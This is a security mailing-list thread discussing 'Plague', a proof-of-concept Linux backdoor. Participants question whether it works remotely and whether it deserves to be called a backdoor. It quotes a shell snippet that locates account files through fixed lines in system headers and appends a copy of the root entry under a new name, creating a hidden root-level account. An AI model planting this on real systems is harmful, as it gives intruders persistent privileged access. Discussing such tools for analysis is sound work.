even if they have ssh access, there is still nothing they can do, except to create two files in there $HOME directories containing expressions from paths.h and sysexits.h ?
Why would that be considered a backdoor? Regards, -Nikolay Kichukov > On 10/22/06, J. Oquendo <[EMAIL PROTECTED]> wrote: >> >> Plague is an odd proof of concept backdoor keeping >> tool based on the premise of using existing system >> files and commands to keep and maintain a backdoor >> on Linux systems. I could have modified this for >> BSD, Solaris, etc., but I didn't feel like doing >> the work... >> >> http://www.infiltrated.net/plague >> > > (from the link) > > if [ -e /usr/include/paths.h ] > > then > > file=`awk 'NR==59 {gsub(/"/,"");print $3}' /usr/include/paths.h` > sed -n '1p' $file|sed 's/root/plaguePoC/g' >> $file > file2=`awk 'NR==74 {print $8}' /usr/include/sysexits.h` > sed -n '1p' $file2|sed 's/root/plaguePoC/g' >> $file2 > > fi > > -------------------------------- > > So this backdoor wouldnt work remotely, correct? You would need to add > the user to the people allowed to ssh in, and poke a hole for ssh in > the firewall./? > > -JP > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
